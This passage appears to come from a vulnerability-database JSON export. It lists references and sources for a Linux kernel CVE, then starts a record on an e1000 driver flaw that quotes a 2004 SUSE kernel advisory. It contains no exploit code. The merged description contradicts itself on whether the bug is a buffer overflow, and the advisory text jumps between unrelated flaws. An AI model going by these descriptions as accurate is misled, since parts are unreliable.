        "url": "https://access.redhat.com/security/cve/cve-2020-27777"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-20239"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-36158"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3635"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-36386"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0427"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-24586"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3348"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-26140"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-26146"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-31440"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3732"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-0129"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-24502"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3564"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-0427"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-23133"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-26144"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3679"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-29368"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-24588"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-29646"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-29155"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3489"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-29660"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-26139"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-28971"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-26143"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3600"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-26145"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-33200"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-29650"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-20194"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-26147"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-31916"
      },
      {
        "trust": 0.3,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24503"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24502"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-31829"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3573"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-26141"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-28950"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-24587"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-24503"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-3659"
      },
      {
        "trust": 0.2,
        "url": "https://ubuntu.com/security/notices/usn-5299-1"
      },
      {
        "trust": 0.2,
        "url": "https://ubuntu.com/security/notices/usn-4997-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3200"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35448"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25013"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20284"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35522"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35524"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-27645"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33574"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3487"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-13435"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-5827"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-24370"
      },
      {
        "trust": 0.2,
        "url": "https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14145"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-13751"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10001"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25014"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19603"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25012"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35521"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-35942"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17594"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36312"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3572"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-12762"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36086"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3778"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22898"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-16135"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36084"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-17541"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3800"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36087"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36331"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-31535"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23841"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-14615"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3445"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22925"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-20673"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23840"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36330"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33033"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20232"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20266"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-20838"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22876"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20231"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36332"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14155"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-17541"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-10001"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36085"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14615"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33560"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17595"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3481"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-42574"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25009"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25010"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35523"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-28153"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-13750"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20197"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3426"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-18218"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3580"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3796"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://security.archlinux.org/cve-2020-26147"
      },
      {
        "trust": 0.1,
        "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-104-04"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.8/5.8.0-1033.34~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.8/5.8.0-1036.38~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25670"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.8.0-1029.32"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1035.37"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-59.66"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25671"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29155"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1038.40"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1036.38"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25673"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-59.66~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1030.32"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.8/5.8.0-1035.37~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.8/5.8.0-1038.40~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4999-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1033.34"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5001-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem-5.10/5.10.0-1033.34"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4997-2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.11.0-1010.10"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.11.0-1011.11"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.11.0-1012.13"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.11.0-1011.12"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.11.0-1009.9"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.11.0-22.23"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-151.157"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1097.99"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26558"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1078.86"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1106.120"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5018-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1109.116"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1092.98"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1121.134"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33909"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1109.118"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-009"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-43527"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44228"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3712"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:5137"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26144"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24504"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20239"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20194"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-0129"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28950"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.5_release_notes/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26143"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:4356"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27777"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29368"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26140"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36386"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29660"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28971"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36158"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26146"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3483"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-45485"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3564"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3612"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3679"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-42008"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28972"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-34693"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-38204"
      },
      {
        "trust": 0.1,
        "url": "https://issues.jboss.org/):"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33194"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:4627"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-26147"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007253"
      },
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163255"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163599"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "166101"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-626"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-26147"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2020-26147"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007253"
      },
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163255"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163599"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "166101"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-626"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-26147"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-05-11T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-26147"
      },
      {
        "date": "2022-02-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-007253"
      },
      {
        "date": "2021-06-23T15:35:21",
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "date": "2021-06-23T15:41:26",
        "db": "PACKETSTORM",
        "id": "163255"
      },
      {
        "date": "2021-06-28T16:22:26",
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "date": "2021-06-23T15:33:13",
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "date": "2021-07-21T16:04:42",
        "db": "PACKETSTORM",
        "id": "163599"
      },
      {
        "date": "2021-12-15T15:27:05",
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "date": "2021-11-10T17:04:39",
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "date": "2022-02-22T17:06:12",
        "db": "PACKETSTORM",
        "id": "166101"
      },
      {
        "date": "2021-11-15T17:25:56",
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "date": "2021-05-11T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202105-626"
      },
      {
        "date": "2021-05-11T20:15:08.947000",
        "db": "NVD",
        "id": "CVE-2020-26147"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-07-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-26147"
      },
      {
        "date": "2024-02-27T02:25:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-007253"
      },
      {
        "date": "2022-07-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202105-626"
      },
      {
        "date": "2022-07-12T17:14:47.870000",
        "db": "NVD",
        "id": "CVE-2020-26147"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote or local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-626"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux\u00a0Kernel\u00a0 Vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007253"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-626"
      }
    ],
    "trust": 0.6
  }
}

var-200408-0086
Vulnerability from variot

The e1000 driver for Linux kernel 2.4.26 and earlier does not properly initialize memory before using it, which allows local users to read portions of kernel memory. NOTE: this issue was originally incorrectly reported as a "buffer overflow" by some sources. This issue is due to a failure of the application to validate user input lengths before processing them. It might be possible to leverage this issue to access sensitive information from kernel memory. Local attackers can use this vulnerability to carry out buffer overflow attacks, which may destroy memory space information and cause privilege escalation. -----BEGIN PGP SIGNED MESSAGE-----


                    SUSE Security Announcement

    Package:                kernel
    Announcement-ID:        SUSE-SA:2004:020
    Date:                   Tuesday, Jul 2nd 2004 18:00 MEST
    Affected products:      8.0, 8.1, 8.2, 9.0, 9.1
                            SUSE Linux Database Server,
                            SUSE eMail Server III, 3.1
                            SUSE Linux Enterprise Server 7, 8
                            SUSE Linux Firewall on CD/Admin host
                            SUSE Linux Connectivity Server
                            SUSE Linux Office Server
    Vulnerability Type:     local privilege escalation
    Severity (1-10):        6
    SUSE default package:   yes
    Cross References:   CAN-2004-0495
            CAN-2004-0496
            CAN-2004-0497
            CAN-2004-0535
            CAN-2004-0626


Content of this advisory:
    1) security vulnerability resolved:
    - chown: users can change the group affiliation of arbitrary
      files to the group they belong to
    - missing DAC check in chown(2): local privilege escalation
        - overflow with signals: local denial-of-service
        - pss, mpu401 sound driver: read/write to complete memory
        - airo driver: read/write to complete memory
        - ALSA: copy_from_user/copy_to_user confused
        - acpi_asus: read from random memory
        - decnet: write to memory without checking
        - e1000 driver: read complete memory
       problem description, discussion, solution and upgrade information
    2) pending vulnerabilities, solutions, workarounds:
    - icecast
            - sitecopy
            - cadaver
            - OpenOffice_org
            - tripwire
            - postgresql*
            - mod_proxy
    - freeswan
    - ipsec-tools
    - less
    - libpng
    - pavuk
    - XFree86*
    - kdebase3
    3) standard appendix (further information)

1) problem description, brief discussion, solution, upgrade information

Multiple security vulnerabilities are being addressed with this security
update of the Linux kernel. These 
vulnerabilities can lead to kernel memory read access, write access 
and local denial of service conditions, resulting in access to the 
root account for an attacker with a local account on the affected 
system.

Missing Discretionary Access Control (DAC) checks in the chown(2) system
call allow an attacker with a local account to change the group
ownership of arbitrary files, which leads to root privileges on affected
systems. It is specific to kernel version 2.6 based systems such as 
the SUSE Linux 9.1 product, that only local shell access is needed to 
exploit this vulnerability. An interesting variant of the missing 
checks is that the ownership of files in the /proc filesystem can be 
altered, while the changed ownership still does not allow the files to 
be accessed as a non-root user for to be able to exploit the 
vulnerability. Systems that are based on a version 2.4 kernel are not 
vulnerable to the /proc weakness, and exploitation of the weakness 
requires the use of the kernel NFS server (knfsd). If the knfsd NFS 
server is not activated (it is off by default), the vulnerability is 
not exposed. These issues related to the chown(2) system call have been 
discovered by Michael Schroeder and Ruediger Oertel, both SUSE LINUX. Found and reported 
to bugtraq by Adam Osuchowski and Tomasz Dubinski, the vulnerability 
allows a remote attacker to send a specially crafted TCP packet to a 
vulnerable system, causing that system to stall if it makes use of 
TCP option matching netfilter rules.

In some rare configurations of the SUSE Linux 9.1 distribution, some 
users have experienced stalling systems during system startup. These 
problems are fixed with this kernel update.



SPECIAL INSTALL INSTRUCTIONS:
==============================
For the impatient: Run YOU (Yast2 Online Update, command 
"yast2 online_update" as root) to install the updates (semi) 
automatically, if you have a SUSE Linux 8.1 and newer system.

